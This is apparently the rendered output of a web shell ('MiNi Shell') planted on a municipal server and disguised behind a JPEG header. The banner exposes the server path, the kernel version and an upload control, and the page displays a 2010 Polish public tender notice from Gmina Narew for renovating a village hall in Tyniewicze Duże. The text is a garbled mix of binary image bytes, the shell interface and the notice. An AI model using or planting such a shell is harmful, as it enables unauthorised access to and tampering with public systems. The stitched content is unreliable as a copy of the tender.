JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100914/290224-N-2010.html

<p class="kh_header"><b>Narew: Remont świetlicy wiejskiej w Tyniewiczach  Dużych wraz  z wyposażeniem</b><br>
<b>Numer ogłoszenia: 290224 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Narew , ul. Mickiewicza 101, 17-210 Narew, woj. podlaskie, tel. 0-85 6816016, faks 0-85 873 35 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.ug.narew.wrotapodlasia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy wiejskiej w Tyniewiczach  Dużych wraz  z wyposażeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
I.Remont  świetlicy  wiejskiej  w Tyniewiczach  Dużych  polegający  na :
1.Wykonanie robót rozbiórkowych zewnętrznych 1,26  m 3
2.Rozebranie szalówki drewnianej ze ścian zewnętrznych  148,16 m 2
3.Rozebranie  pokrycia dachowego z dachówki cementowej 228,912 m2
4.Rozebranie pokrycia  z gąsiorów  15,20 mb
5.Rozebranie  obróbek blacharskich  okapów  i szczytów  20,436 m2
6.Rozebranie  rynien  40,4 mb
7.Rozebranie rur spustowych 21,2 mb
8.Rozebranie ścianek działowych  z łat  i rygli   8,28 m2
9.Wykopy oraz przekopy koparkami przedsiębnymi  71,1 m3
10.Zasypanie wykopów  z ubiciem warstwami co 15 cm  71,1 m3
11.Naprawa fundamentu -uzupełnienie kamieniem polnym łączonym  zaprawą   0,216 m3
12.Wykonanie izolacji przeciwwigociowej  2 krotne    2x 57,36 m2
13.Wykonanie rusztu drewnianego  pod szalówkę 180,13 m2
14.Wykonanie /montaż/  szalówki drewnianej  z drewna świerkowego szer.15 cm wraz z dwukrotnym 
     lakierowaniem, gat. I  -180,13 m2
15.Wykonanie wyprawy elewacyjnej cienkowarstwowej z tynku mineralnego -25,29 m 2
16.Wymiana słupków 14x14 cm -zewnętrznych  w scianach  drewnianych od strony północnej-5,6 mb
17.Przemurowanie komina   0,48 m3
18.Wymiana podwaliny  w ścianach drewnianych - 28,2 mb
19.Zabicie drzwi  zewnętrznych oraz okien -1,89m2
20.Wykonanie  izolacji cieplnej  z wełny  mineralnej   1,89 m2
21.Naprawa okien w ganku, ponowne ich odmalowanie, uzupełnienie  kitu   5,28 szt
22.Odgrzybienie  elementów  drewnianych dachu  228,0  + 122,4 m2
23.Trzykrotna impregnacja grzybobójcza  konstrukcji  dachowej   350,4 m2
24.Wykonanie izolacji  z folii polietylenowej szerokiej 228 m2
25.Pokrycie dachu blachą ocynkowaną trapezową   228 m2
26.Obróbki z blachy ocynkowanej  15,46 m2
27.Rynny  dachowe z blachy ocynkowanej   38,8 mb
28.Rury spustowe z  blachy  ocynkowanej 20,8 mb
29.Wykonanie deskowania -szalowanie okapu -podbitka  21,6 m2 
30.Wykonanie przyłącza kanalizacyjnego z rur PCV śr. 150 mm  -10 mb
31.Demontaż  starych i  montaż   nowych  skrzydeł drzwiowych  płytowych wewnętrznych,jednodzielnych , 
    pełnych, fabrycznie  wykończonych 11,34 + 4,2  m2
32.Demontaż  starych  i montaż nowych ościeżnic , dwukrotnie malowanych - szt 8
33.Dwukrotne malowanie  podłogi   farbą  olejną lub  ftalową - 114 m2 -kolor orzech  sredni
34.Zeskrobanie i zmycie starej farby olejnej ze ścian  140,08 m2
35.Dwukrotne malowanie  farbą  olejną  lub ftalową  płyt pilśniowych twardych  -140,08 m2 kolor  jasnozielony
36.Rozebranie drewnianych podłóg ślepych  w ganku - 4,8 m2
37.Zasypanie z zagęszczeniem  wykopu po zdjęciu podłogi w ganku -1,44 m3
38.Wykonanie płyty betonowej gr.10 cm - 0,48 m3
39.Wykonanie  izolacji  przeciwilgociowej  z dwóch warstw - 4,8+4,8  m2
40.Wykonanie izolacji cieplnej  z płyt styropianowych  -4,8 m2
41.Podkład betonowy gr.5 cm  -0,24 m3
42.Wykonanie wylewki samopoziomującej gr.10 mm na podłożu betonowym -4,87 m2
43.Okładziny podłóg z Gresu o wym 30 x 30 cm na zaprawie  klejowej -  4,8 m2 gat.I kolor jasny
44.Wykonanie obudowy ścian ganku  z płyt gipsowo-kartonowych  na konstrukcji drewnianej, wypełnionej
     wełną  mineralną -15,11 m2
45.Licowanie  ścian płytkami glazurowymi   o wymiarach 20 x25   na zaprawie klejowej  gat I -15,11 m2 kolor 
     jasny
46.Montaż miski ustępowej  koloru białego gat.I  kpl 1
46.Montaż umywalki na postumencie  koloru białego gat. I  kpl 1
48.Montaż okna  drewnianego zespolonego dwuszybowego  -1,92  m2
Szczegółowy zapis poszczególnych  pozycji remontowych zawiera  załączony do niniejszej specyfikacji  przedmiar robót, zestawienie  materiałów, robocizny, pracy  sprzętu  oraz  specyfikacja  wykonania  i odbioru  robót.
  Użyte   w opracowaniach  nazwy   handlowe oraz wskazani  producenci  materiałów  mogą  być   zastąpione  materiałami  równoważnymi  stosownie  do art.30  ust.4. ustawy Pzp  , o podobnych  lub równoważnych  parametrach  działania.
II.Dostawy do  świetlicy wiejskiej  w Tyniewiczach Dużych wraz z częściowym ustawieniem lub zawieszeniem :
1.stół składany 160x80cm wys.72,5  drewniany blat, metalowy stelaż   szt 10
2.krzesło składane metalowy stalaż,  siedzisko  i oparcie  tapicerowane skajem     szt 50
3.szafka kuchenna  pod zlewozmywak  80x85  x50, drewniana    szt 1 -ustawienie
4.szafka kuchenna dolna, 90x85 x50 cm 1 półka dwoje drzwiczek  drewniana ,     szt 1-ustawienie
5.szafka kuchenna dolna ,80x 85x50 cm ,1 półka, dwoje drzwiczek, drewniana  szt 3 -ustawienie
6.szafka kuchenna górna 40x60x35 cm  ,1 półka, drzwiczki  pojedyńcze, drewniana , szt 3-zawieszenie
7.szafka kuchenna górna-suszarka 80x60 x 35 cm ,dwoje drzwiczek, bez półki, drewniana, szt 1 -zawieszenie
8.szafka kuchenna górna,80x60x35 cm 1 półka, dwoje drzwiczek , drewniana  szt 1-zawieszenie
9.zlewozmywak kuchenny 2 komorowy  z blachy nierdzewnej   szt 1-zamontowanie
10.bateria zlewozmywakowa jednouchwytowa, chromowana, obrotowa, wylewka około 22 cm   szt 1- 
    zamontowanie
11.lodówka bez  zamrażalnika wysokość około  120 cm ,pojemn.145 l, szt 1
12.czajnik  kuchenny elektryczny 1,7 litra z  blachy nierdzewnej    szt  1
13.patelnia   teflonowa, srednica 28  cm    szt 1
14.garnek duży emaliowany , srednica 22 cm z pokrywką  szt 3
15.czajnik metalowy na  kuchenkę gazową   szt 1 
16.komplet sztućców  na 6 osób łyżka, widelec, nóż łyżeczka  kpl 9
17.talerz  płaski   , srednica ok.24 cm z  duraleksu , czarny,   szt 50
18.półmisek owalny , długość 36 cm z duraleksu, czarny szt 10
19.salaterka owalna , długość 16 cm z duraleksu, czarna   szt 15
20.barszczarka pojemności 350 ml , z duraleksu, czarna,  szt 50
21.komplet 6 szklanek z uszkiem z duraleksu, czarne    kpl 9
22.salaterka owalna , długość 24 cm,porcelanowa szt  10
23.komplet   6 kieliszków poj. 25 m l    kpl 9
24.komplet 6 szklanek do napojów poj.250 ml    kpl 9
25.komplet   3 kieliszków duzych poj.200 ml  kpl  6
26.patera  szklana na ciasto , srednica 32 cm     szt 3
27.patera szklana do owoców  srednica 26 cm   szt 5
28.miska okrągła plastykowa , srednica  44 cm  szt 1
29.miska okrągła plastykowa, średnica 32  cm   szt  1 
30.miska okrągła plastykowa  srednica 26 cm  szt 1
31.wiaderko plastykowe, poj.12 l       szt 1
32.łyżka wazowa szt 1
33.taca plastykowa 50x35 cm   szt 1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.44.30.00-4, 45.42.11.51-7, 45.45.00.00-6, 45.43.11.00-9, 45.43.12.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.01.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ofertamusi byc zabezpieczona wadium w wysokości 2500 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie -załacznik Nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz dokumentujący zrealizowanie w ostatnich  5 latach przed terminem składania ofert, a jeżeli  okres działalności  był krótszy, w tym okresie, co  najmniej  1 zadania polegającego na budowie, rozbudowie lub remoncie  budynku  użyteczności publicznej  o wartości  co najmniej 100000 zł netto  , z podaniem  ich  rodzaju, wartości , daty  i miejsca  wykonania oraz załączeniem  dokumentu  potwierdzającego, że  roboty  zostały wykonane  zgodnie z  zasadami  sztuki budowlanej  i prawidłowo  ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie -załacznik Nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie -załącznik Nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie -załacznik Nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin  realizacji  zamówienia może zostać przedłużony po spełnieniu  
    następującego warunku :
     Gmina Narew wystąpi z umotywowanym  wnioskiem do Zarządu Województwa
     Podlaskiego o zgodę na przedłużenie terminu, która  zostanie  wyrażona  przez
     zawarcie aneksu do umowy o dofinansowanie , z dnia 8 wrzesnia 2010 r, mocą 
     którego  zostanie wydłużony termin złożenia przez Gminę  wniosku o platność,
     wówczas termin realizacji zamówienia  może  zostać maksymalnie wydłużony 
     do początku  terminu złożenia  przez Gminę  wniosku o płatność do Zarządu
     Województwa Podlaskiego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ug.narew.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Narew 17-210 Narew ul. Mickiewicza 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 09:45, miejsce: Urząd Gminy Narew 17-210 Narew ul. Mickiewicza 101  sekretariat  I pietro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający niniejszym informuje , że realizacja niniejszego zamówienia stanowić będzie     wdrożenie projektu pod nazwą: Remont świetlicy wiejskiej w Tyniewiczach Dużych  wraz z wyposażeniem na który Zamawiający uzyskał dofinansowanie ze środków Unii Europejskiej  w ramach  działania Odnowa i rozwój wsi objętego  PROW na lata 2007-2013 na podstawie umowy Nr 00036-6930-UM1030037/10  zawartej w dniu 8 września 2010  r. pomiędzy Samorządem Województwa Podlaskiego a  Gminą Narew.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com